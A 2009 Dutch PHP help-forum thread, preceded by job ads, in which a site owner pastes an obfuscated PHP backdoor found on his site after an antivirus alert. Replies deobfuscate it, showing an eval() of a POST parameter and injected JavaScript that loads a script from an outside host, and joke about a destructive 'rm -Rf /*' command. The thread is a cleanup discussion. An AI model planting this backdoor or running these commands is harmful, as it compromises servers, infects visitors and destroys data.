trojaans paard

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Front end developer

Functie Jij als ervaren Front end developer bent een expert het gebied van Javascript en React. Je wordt onderdeel van een multidisciplinair team bestaande uit een PO, twee Front end developers, een DevOps/Back end developer, een UX/UI designer en een projectmanager. Verder is er iemand verantwoordelijk voor de HR en is de algemeen directeur nauw betrokken bij alle projecten. Dagelijks hou jij je bezig met de verschillende projecten die zijn opgenomen in de sprint. Daarnaast denk je mee over mogelijke oplossingen om de behoefte van de klant op de beste manier in te vullen. Verder spar jij intern met collega’s

Bekijk vacature »

Traineeship Full Stack Java developer

Dit ga je doen Start jij op 7 augustus bij de Experis Academy dan kickstart jij jouw IT-carrière! We leiden je op tot een gewilde Full Stack Java Developer met alle kennis en vaardigheden die nodig zijn om de arbeidsmarkt te betreden. Wat kun je verwachten, hoe zit een dag in het leven van een Trainee eruit? Periode 1 Als Full Stack Java Developer Trainee volg je vanuit huis een op maat gemaakte onlinetraining die in het Engels wordt gegeven. De tijd die je kwijt bent aan het volgen van de training kun je vergelijken met een fulltime werkweek. In

Bekijk vacature »

Full stack developer Node.js, React Remote

Functie Als fullstack JavaScript developer vind jij het uitdagend om op basis van concrete klantvragen nieuwe functionaliteiten te ontwikkelen. Bij voorkeur worden deze functionaliteiten op een bepaalde manier geprogrammeerd, zodat ze door meerdere klanten te gebruiken zijn. Je hebt dus vaak te maken met abstracte vraagstukken. Om dit te kunnen realiseren sta je nauw in contact met de product owner en/of klant. Je bent niet alleen onderdeel van het development team, maar hebt ook vaak contact met de product-owner en/of klanten om daardoor inzichten te verzamelen die leiden tot productverbeteringen. • Inzichten verzamelen bij de klant en/of product owner •

Bekijk vacature »

C# .NET Developer IoT SQL Server

Samengevat: Wij ontwikkelen innovatieve oplossingen om apparaten en bezittingen op een eenvoudige en flexibele manier te beveiligen. Ben jij een C# .NET developer? Heb jij ervaring met C# en SQL server? Vaste baan: C# .NET Developer IoT HBO €3.200 - €4.500 Deze werkgever is gespecialiseerd in hoogwaardige GSM/GPRS alarm- en telemetrietechnologie. Met een eigen productlijn en klantspecifieke ontwikkelingen biedt deze werkgever oplossingen om op afstand te meten, melden, loggen en aansturen, ook op plaatsen zonder stroomvoorziening. Onze producten worden gekarakteriseerd door flexibiliteit in de configuratie, betrouwbaarheid en een extreem laag stroomverbruik. Zij werken voor MKB klanten. Deze werkgever heeft veel

Bekijk vacature »

Lead Fullstack developer

Functie omschrijving Ben jij een leergierige en ambitieuze junior developer met technische skills? Ben jij op zoek naar een werkgever die jouw de volledige vrijheid geeft om jezelf tot een volwaardige senior te ontwikkelen? Wij zijn op zoek naar een full stack developer die zich bezig wil bezig houden met het uitbreiden en verbeteren van de online webshop. Een onderdeel van jouw werkzaamheden is naast het beheren van de webshop ook om de processen en structuren te stroomlijnen. Werkzaamheden Onderhouden van de webshop (denk aan het bijhouden van de voorraad); Nieuwe functies toevoegen aan de product configurator door middel van

Bekijk vacature »

Front-end PHP Developer

Dit ga je doen Bouwen van de frontend van een nieuwe applicaties; Verbeteren van de user experience; Opstellen van een style guide; Schakelen met collega developers over de te bouwen oplossing; Je speelt een belangrijke rol in het neerzetten van het nieuwe systeem; Werken met o.a. Symfony 6, API Platform, Twig, Javascript, Redis Automatiseren van processen; Koppelen van verschillende functionaliteiten; Unit tests, integration tests, end-to-end tests; In de toekomst ga je nog werken aan andere projecten. Hier ga je werken Voor onze vaste opdrachtgever in de regio Breda zijn wij op zoek naar een Frontend Developer. Het betreft een organisatie

Bekijk vacature »

Back-end Programmeur

Functieomschrijving Heb jij kort geleden je HBO ICT in ontvangst mogen nemen? Of ben je toe aan een nieuwe uitdaging? Voor een ambitieuze werkgever in de regio van Breda zijn wij op zoek naar een Back-end programmeur met affiniteit met C#.NET, SQL en MS Access. Samen met team bestaand uit ware ICT professionals ben je verantwoordelijk voor het bouwen van maatwerk software voor hun klanten. Belangrijk is dat je kennis of ervaring hebt van C#.NET en SQL. Je toont een flexibele en sociale houding naar klanten toe. Je denkt in nieuwe mogelijkheden & gaat graag de uitdaging aan. Bedrijfsprofiel De

Bekijk vacature »

Senior Lead Front End Developer

Functieomschrijving Voor Stichting Waternet zijn wij op zoek naar een senior Lead Front End Developer. Binnen het DevOps team Online zijn we op zoek naar een Senior Lead Front End developer met kennis van toegankelijkheid. Deze developer zal zich bezighouden met development van webpaginas die in verbinding staan met systemen uit het back office. Taken Ontwerpen, ontwikkelen, implementeren, documenteren en beheren van webapplicaties in een Azure-omgeving Debuggen, analyseren en oplossen van problemen in de OTAPomgevingen Je participeert in het DevOpsTeam Online voor het verder uitwerken en implementeren van gebruikerswensen Je bent betrokken bij toegankelijkheid audits en het implementeren van WCAG

Bekijk vacature »

.NET developer

Functie Als .NET ontwikkelaar ga jij aan de slag bij een van onze klanten actief in de High Tech Industrie. Onze klanten zijn voornamelijk gelokaliseerd in de omgeving van Eindhoven. Wij zijn erg selectief als het gaat om de projecten die wij accepteren en richten ons dan ook alleen op innovatieve en complexe projecten. Omdat onze klanten voornamelijk gespecialiseerd zijn in de machinebouw, werk jij ook vaak dicht tegen de machines aan. Ons team bestaat momenteel uit Embedded engineers, IOT developers en Cloud engineers. Wij werken voornamelijk aan Microsoft projecten waar er gebruik wordt gemaakt van WPF, UWP, .NET Core

Bekijk vacature »

(Lead) PHP Software Developer

Functie omschrijving Voor een klein softwarebedrijf in Breda, zijn wij op zoek naar een PHP software developer met een aantal jaar werkervaring. Je krijgt een plek in een klein team met 2 andere software developers. Wil jij graag werken met de nieuwste technieken bij een bedrijf waar jij de lead gaat nemen in de verder ontwikkeling en modernisering van een eigen software pakket? Dan ben je hier aan het juiste adres! Jouw werkzaamheden gaan er als volgt uit zien: Je gaat aan de slag met de ontwikkeling en vernieuwing van het "in-house" ontwikkelde multimedia platform. Je neemt de lead in

Bekijk vacature »

Senior .NET developer

Functie As a Senior .NET developer you will work in our Research & development team. Our team consists of 17 colleagues! We are currently busy setting up a completely new architecture for a new product. We use VS2022 and .NET 6.0 for our new product. Your function is therefore mainly backend oriented. Since we develop measuring equipment for the chemical industry, it is also very important to develop high-quality software for its control. You are also responsible for designing, implementing and testing new features. For this position its also very important to ensure future-proof and sustainable architecture. Eisen - A

Bekijk vacature »

Full Stack Java ontwikkelaar

Functieomschrijving Voor de politie zijn wij op zoek naar een Full stack Java ontwikkelaar. Als ervaren full stack Java ontwikkelaar binnen de gewenste deadlines meewerken aan de totstandkoming van de gewenste werkzaamheden. Taken Upgraden van GeoServer, SOLR, Oracle Spatial database, Tomcat Migreren Oracle Spatial naar PostgreSQL/PostGIS Migreren SOLR naar ElasticSearch Geografische gegevens op het interne netwerk beschikbaar maken Doorontwikkelen en actualiseren van de geografische services Het up to date brengen van de CI/CD pipeline, samen met medewerkers die verantwoordelijk zijn voor de CI/CD tooling Aanspreekbaar op de solution architectuur en stemt die met collega's in het cluster Geo De opdracht

Bekijk vacature »

Fullstack developer

Functie omschrijving Ben jij toe aan een nieuwe uitdaging en zou jij graag bij een platte maar informele organisatie werken? Voor een mooi softwarebedrijf in omgeving Alblasserdam zijn wij op zoek naar versterking op de afdeling Software Development! Als Fullstack react.js developer wordt je bij dit bedrijf onderdeel van de volledige ontwikkeling van requirement tot oplevering! Jouw focus ligt op de front end en alles wat daarbij komt kijken. Je gaat ontwerpen, ontwikkelen, testen en valideren. Je zult voornamelijk werken met React.js en Typescript. Maar ook Javascript, HTML en CSS komen aanbod. Daarnaast zal je ook regelmatig met de back

Bekijk vacature »

Java Developer

Dit ga je doen Als Java Developer ben je verantwoordelijk voor: Het ontwikkelen van nieuwe en bestaande webservices; Het uitbreiden van functionaliteiten binnen de producten- en dienstenportefeuille; Het werken aan gegevensuitwisseling met bijvoorbeeld SOAP; Testen van frameworks met gebruik van UNIT en Selenium. Hier ga je werken De organisatie waar je komt te werken is een semi-overheidsinstelling, gesitueerd in Utrecht en zorgt voor een goede samenwerking tussen verschillende overheidsinstanties. Het is een familiaire club die gaat voor kwaliteit en langdurige relaties. Zo zorgen zij ervoor dat er op grote schaal vertrouwelijke informatie tussen verschillende overheidsinstellingen wordt uitgewisseld. Hun werk zorgt

Bekijk vacature »

Scrum Master

TenneT is hard groeiend om de onze ambities waar te kunnen maken. Zo nemen wij een leidende rol in het aanjagen van de energietransitie. Het werven van nieuw talent speelt daarin een cruciale rol. Wij zijn op zoek naar een gedreven Scrum master op onze locatie Arnhem die hieraan wil bijdragen en misschien ben jij dat wel? Jouw bijdrage aan TenneT Je begeleidt twee teams binnen de afdeling Platform Services (PLS). Je helpt mee de devops manier van werken van de teams verder door te ontwikkelen. Je helpt de PO bij het managen van de product backlog; het voorbereiden van

Bekijk vacature »
Mark Koggel

Mark Koggel

12/05/2009 09:27:00
Quote Anchor link
Hoi allemaal,

Ik gebruik avast antivirus en volgens dat programma zit er een deel van JS:Redirector-H3 in mijn website.

Nu staat deze php in mijn site en als ik hem weg haal geeft ie geen melding meer van die trojaan:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihGcFNXKXt2YXIgYnhCPSd2YWA3MmAyMGFgM2RgMjJgNTNjcmA2OXB0RW5gNjdpbmVgMjJgMmNiYDNkYDIyVmVgNzJzaW9uKGAyOStgMjJgMmNgNmFgM2RgMjJgMjJgMmN1YDNkbmF2aWdgNjF0YDZmcmAyZXVzYDY1YDcyQWdgNjVudGAzYmlgNjYoKHVgMmVgNjluZGV4T2YoYDIyV2luYDIyKWAzZTApYDI2YDI2KHVgMmVpbmRlYDc4T2YoYDIyTlRgMjA2YDIyKWAzYzBgMjlgMjZgMjZgMjhgNjRvY3VgNmRlbnRgMmVgNjNgNmZva2A2OWVgMmVgNjlgNmVkZWA3OE9gNjYoYDIybWlla2AzZDFgMjJgMjlgM2MwKWAyNmAyNih0eXBlb2YoenJ2YDdhdHNgMjlgMjFgM2R0eWA3MGVvZihgMjJgNDFgMjJgMjkpKWA3YmA3YXJgNzZ6dGA3M2AzZGAyMkFgMjJgM2JldmFgNmNgMjhgMjJpYDY2KHdpbmRvYDc3YDJlYDIyK2ErYDIyKWpgM2RqK2AyMmAyYmFgMmJgMjJNYWA2YW9yYDIyK2IrYStgMjJNaWA2ZWA2ZnJgMjJgMmJgNjJgMmJhYDJiYDIyQmA3NWlsYDY0YDIyK2IrYDIyamAzYmAyMilgM2JkYDZmY2A3NWA2ZGVudGAyZXdyaXRlKGAyMmAzY3NgNjNyaXB0YDIwc3JjYDNkYDJmYDJmZ3VtYmxhYDcyYDJlY25gMmZyYDczYDczYDJmYDNmaWRgM2RgMjIrYDZhK2AyMmAzZWAzY2A1Y2AyZnNjcmlwYDc0YDNlYDIyKWAzYmA3ZCc7dmFyIEZPUTc9YnhCLnJlcGxhY2UoRnBTVywnJScpO3ZhciB4d3B6PXVuZXNjYXBlKEZPUTcpO2V2YWwoeHdweil9KSgvYC9nKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
<script language="php"> include("setup.php");</script>

Maar als ik deze weghaal, werkt mijn site ook niet meer goed.
Weet iemand wat er veranderd moet worden aan deze code?

bij voorbaat dank,

Mark
 
PHP hulp

PHP hulp

04/05/2024 05:33:10
 

12/05/2009 09:29:00
Quote Anchor link
Weet niet wát je op je site heb staan, maar zoiets als dat kan nooit goed zijn..
 
Henktrol

henktrol

12/05/2009 09:31:00
Quote Anchor link
Chris Kortaan schreef op 12.05.2009 09:29:
Weet niet wát je op je site heb staan, maar zoiets als dat kan nooit goed zijn..

Haha inderdaad xD

Nou ik zou als eerste dat script language weghalen!!

Doe altijd om te includen

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<?php include("setup.php"); ?>


(Goede Anti Virus ;))

Irritante code in één lijn, verder heb ik ook niet super veel verstand van javascript die erin zit, dus daar moet iemand anders naar kijken :P

Kun je de code splitsen in regels, bv:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
<?php
if(!function_exists('...'){
        echo "weetikveel";
}
else {
        echo "nee inderdaad";
}
[
/code]

En heb je misschien een voorbeeldje? Wat is het voor site dan xD
Een hack site? :P
Gewijzigd op 01/01/1970 01:00:00 door henktrol
 
Mark Koggel

Mark Koggel

12/05/2009 09:33:00
Quote Anchor link
Hoi,

sorry ik heb alles geknipt en geplakt in een keer van mijn site. het is een ptc site. ik heb dat script language weggehaald maar dat heeft nog niet geholpen

alvast bedankt,

Mark
 

12/05/2009 09:34:00
Quote Anchor link
Oei, leuk, eens zien of ik het leesbaar kan maken.
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<?php
  if (!function_exists('tmp_lkojfghx'))
  {

      if (isset($_POST['tmp_lkojfghx3']))
          eval($_POST['tmp_lkojfghx3']);
      if (!defined('TMP_XHGFJOKL'))
          define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihGcFNXKXt2YXIgYnhCPSd2YWA3MmAyMGFgM2RgMjJgNTNjcmA2OXB0RW5gNjdpbmVgMjJgMmNiYDNkYDIyVmVgNzJzaW9uKGAyOStgMjJgMmNgNmFgM2RgMjJgMjJgMmN1YDNkbmF2aWdgNjF0YDZmcmAyZXVzYDY1YDcyQWdgNjVudGAzYmlgNjYoKHVgMmVgNjluZGV4T2YoYDIyV2luYDIyKWAzZTApYDI2YDI2KHVgMmVpbmRlYDc4T2YoYDIyTlRgMjA2YDIyKWAzYzBgMjlgMjZgMjZgMjhgNjRvY3VgNmRlbnRgMmVgNjNgNmZva2A2OWVgMmVgNjlgNmVkZWA3OE9gNjYoYDIybWlla2AzZDFgMjJgMjlgM2MwKWAyNmAyNih0eXBlb2YoenJ2YDdhdHNgMjlgMjFgM2R0eWA3MGVvZihgMjJgNDFgMjJgMjkpKWA3YmA3YXJgNzZ6dGA3M2AzZGAyMkFgMjJgM2JldmFgNmNgMjhgMjJpYDY2KHdpbmRvYDc3YDJlYDIyK2ErYDIyKWpgM2RqK2AyMmAyYmFgMmJgMjJNYWA2YW9yYDIyK2IrYStgMjJNaWA2ZWA2ZnJgMjJgMmJgNjJgMmJhYDJiYDIyQmA3NWlsYDY0YDIyK2IrYDIyamAzYmAyMilgM2JkYDZmY2A3NWA2ZGVudGAyZXdyaXRlKGAyMmAzY3NgNjNyaXB0YDIwc3JjYDNkYDJmYDJmZ3VtYmxhYDcyYDJlY25gMmZyYDczYDczYDJmYDNmaWRgM2RgMjIrYDZhK2AyMmAzZWAzY2A1Y2AyZnNjcmlwYDc0YDNlYDIyKWAzYmA3ZCc7dmFyIEZPUTc9YnhCLnJlcGxhY2UoRnBTVywnJScpO3ZhciB4d3B6PXVuZXNjYXBlKEZPUTcpO2V2YWwoeHdweil9KSgvYC9nKTsKIC0tPjwvc2NyaXB0Pg=='));
      function
tmp_lkojfghx($s)
      {

          if ($g = (substr($s, 0, 2) == chr(31) . chr(139)))
              $s = gzinflate(substr($s, 10, -8));
          if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
              foreach ($a[0] as $v)
                  if (count(explode("\n", $v)) > 5)
                  {

                      $e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v) || preg_match('#[\(\[](\s*\d+,){20,}#', $v);
                      if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode'))) || ($e && strpos($v, 'document.write')))
                          $s = str_replace($v, '', $s);
                  }

          $s1 = preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#', '', $s);
          if (stristr($s, '<body'))
              $s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1);
          elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>'))
              $s = $s1 . TMP_XHGFJOKL;
          return $g ? gzencode($s) : $s;
      }
      function
tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0)
      {

          $s = array();
          if ($b && $GLOBALS['tmp_xhgfjokl'])
              call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d);
          foreach (@ob_get_status(1) as $v)
              if (($a = $v['name']) == 'tmp_lkojfghx')
                  return;
              else
                  $s[] = array($a == 'default output handler' ? false : $a);
          for ($i = count($s) - 1; $i >= 0; $i--)
          {

              $s[$i][1] = ob_get_contents();
              ob_end_clean();
          }

          ob_start('tmp_lkojfghx');
          for ($i = 0; $i < count($s); $i++)
          {

              ob_start($s[$i][0]);
              echo $s[$i][1];
          }
      }
  }

  if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2')
      $GLOBALS['tmp_xhgfjokl'] = $a;
  tmp_lkojfghx2();
?>
zo is het al.
Zo te zien plaatst het dus alleen js op je site dmv set_error_handler. Dus als je geen fout op je site zou hebben zou, denk ik, ook geen js op je site komen.
Verder moet je je site nu goed nalopen, want dit is er dus opgekomen, het kan zomaar zijn dat er weer een keer later hetzelfde of iets anders op komt.
Gewijzigd op 01/01/1970 01:00:00 door
 
Mark Koggel

Mark Koggel

12/05/2009 09:35:00
Quote Anchor link
Ik heb alleen dit laten staan
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
<?php include("setup.php");</script>
en nu doet ie het perfect :-) geen melding meer.

Bedankt jongens
 

12/05/2009 09:37:00
Quote Anchor link
Dit is wat ik er van heb kunnen maken...

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?php
// Zie die van Karl :)
?>


Overigens, het stukje base64 is dus een stukje javascript, die php vervolgens bewerkt..
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<script language=javascript><!--
(function(FpSW){var bxB='va`72`20a`3d`22`53cr`69ptEn`67ine`22`2cb`3d`22Ve`72sion(`29+`22`2c`6a`3d`22`22`2cu`3dnavig`61t`6fr`2eus`65`72Ag`65nt`3bi`66((u`2e`69ndexOf(`22Win`22)`3e0)`26`26(u`2einde`78Of(`22NT`206`22)`3c0`29`26`26`28`64ocu`6dent`2e`63`6fok`69e`2e`69`6ede`78O`66(`22miek`3d1`22`29`3c0)`26`26(typeof(zrv`7ats`29`21`3dty`70eof(`22`41`22`29))`7b`7ar`76zt`73`3d`22A`22`3beva`6c`28`22i`66(windo`77`2e`22+a+`22)j`3dj+`22`2ba`2b`22Ma`6aor`22+b+a+`22Mi`6e`6fr`22`2b`62`2ba`2b`22B`75il`64`22+b+`22j`3b`22)`3bd`6fc`75`6dent`2ewrite(`22`3cs`63ript`20src`3d`2f`2fgumbla`72`2ecn`2fr`73`73`2f`3fid`3d`22+`6a+`22`3e`3c`5c`2fscrip`74`3e`22)`3b`7d';var FOQ7=bxB.replace(FpSW,'%');var xwpz=unescape(FOQ7);eval(xwpz)})(/`/g);
 --></script>
Gewijzigd op 01/01/1970 01:00:00 door
 
Henktrol

henktrol

12/05/2009 13:10:00
Quote Anchor link
Mark Koggel schreef op 12.05.2009 09:35:
Ik heb alleen dit laten staan
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
<?php include("setup.php");</script>
en nu doet ie het perfect :-) geen melding meer.

Bedankt jongens[/quote]

Nu doe je het nog niet goed xD

PHP =
<?php include("setup.php"); ?>

en geen </script> ;)
 
Hipska BE

Hipska BE

12/05/2009 13:33:00
Quote Anchor link
Ik zie dit ertussen staan:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
<?

if (isset($_POST['tmp_lkojfghx3']))
          eval($_POST['tmp_lkojfghx3']);

?>


Lijkt me UITERST gevaarlijk! Dit voert gewoon code uit die een gebruiker kan meesturen aan je pagina. Dit is dus een ingebouwde trojan in PHP!!!!!

Weggooien dit script en nu METEEN!
 
Crude Oil

Crude Oil

12/05/2009 16:32:00
Quote Anchor link
ja misschien wel :P
 

12/05/2009 16:38:00
Quote Anchor link
php schreef op 12.05.2009 16:32:
ja misschien wel :P

Nee, zeker weten.
Je wilt nooit of te nimmer dat een gebruiker php op je server kan uitvoeren.
 
- SanThe -

- SanThe -

12/05/2009 16:42:00
Quote Anchor link
Karl schreef op 12.05.2009 16:38:
Je wilt nooit of te nimmer dat een gebruiker php op je server kan uitvoeren.

Echt niet?

Deze ook niet?
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?php
exec('rm -R /*');
?>

Voor de lezers: NIET UITPROBEREN.
Stel dat het is toegestaan dan heb je een heel groot probleem.
 

12/05/2009 17:05:00
Quote Anchor link
SanThe schreef op 12.05.2009 16:42:
Karl schreef op 12.05.2009 16:38:
Je wilt nooit of te nimmer dat een gebruiker php op je server kan uitvoeren.

Echt niet?

Deze ook niet?
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?php
exec('rm -R /*');
?>

Naja, met een knopje "Self destruct" mag het wel.

SanThe schreef op 12.05.2009 16:42:
Stel dat het is toegestaan dan heb je een heel groot probleem.

Ik vraag me altijd af of het werkt. Ik denk iig wel dat je home wordt verwijderd, maar de rest blijft bestaan, ook als je onder root zit denk ik. Maar goed toch effe voor de duidelijkheid:

JE MOET GEEN DINGEN PROBEREN WAARVAN JE NIET WEET WAT ZE DOEN!
 
TJVB tvb

TJVB tvb

12/05/2009 17:40:00
Quote Anchor link
Karl schreef op 12.05.2009 17:05:
SanThe schreef op 12.05.2009 16:42:
Stel dat het is toegestaan dan heb je een heel groot probleem.

Ik vraag me altijd af of het werkt. Ik denk iig wel dat je home wordt verwijderd, maar de rest blijft bestaan, ook als je onder root zit denk ik. Maar goed toch effe voor de duidelijkheid:

JE MOET GEEN DINGEN PROBEREN WAARVAN JE NIET WEET WAT ZE DOEN!

rm -Rf /* is dan handiger, dan voorkom je allerlei vragen. Als je dat als root doet heb je wel een probleem. Er zijn wat dingen gelokt of waar je als root niet eens zomaar aan mag komen maar verder gaat eigenlijk alles weg (Klasgenoot van me heeft dat bij een pc die uit de roulatie ging gedaan)
 

12/05/2009 17:47:00
Quote Anchor link
TJVB schreef op 12.05.2009 17:40:
rm -Rf /* is dan handiger

Daar had ik inderdaad niet opgelet, maar force is ook wel handig om d'r bij te hebben :-)
TJVB schreef op 12.05.2009 17:40:
Als je dat als root doet heb je wel een probleem. Er zijn wat dingen gelokt of waar je als root niet eens zomaar aan mag komen maar verder gaat eigenlijk alles weg (Klasgenoot van me heeft dat bij een pc die uit de roulatie ging gedaan)

Mjah, ik meen dus dat ik ooit eens heb gelezen dat linux zichzelf beschermd, dus dat je belangrijke bestanden niet mag weggooien...
 
TJVB tvb

TJVB tvb

12/05/2009 17:55:00
Quote Anchor link
Ja, maar als root kun je bij heel veel bestanden wel waardoor die tijdens het opstarten vanalles mist en niet verder gaat. Je kunt het proberen in een virtuele machine om het eens te testen.
 

12/05/2009 17:59:00
Quote Anchor link
TJVB schreef op 12.05.2009 17:55:
Ja, maar als root kun je bij heel veel bestanden wel waardoor die tijdens het opstarten vanalles mist en niet verder gaat. Je kunt het proberen in een virtuele machine om het eens te testen.

Dat staat sowieso nog op m'n lijstje om te kloten met linux :-P.
Maar nu nog even niet.
En ik heb hier ook nog wel genoeg oude bakken liggen :-).
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.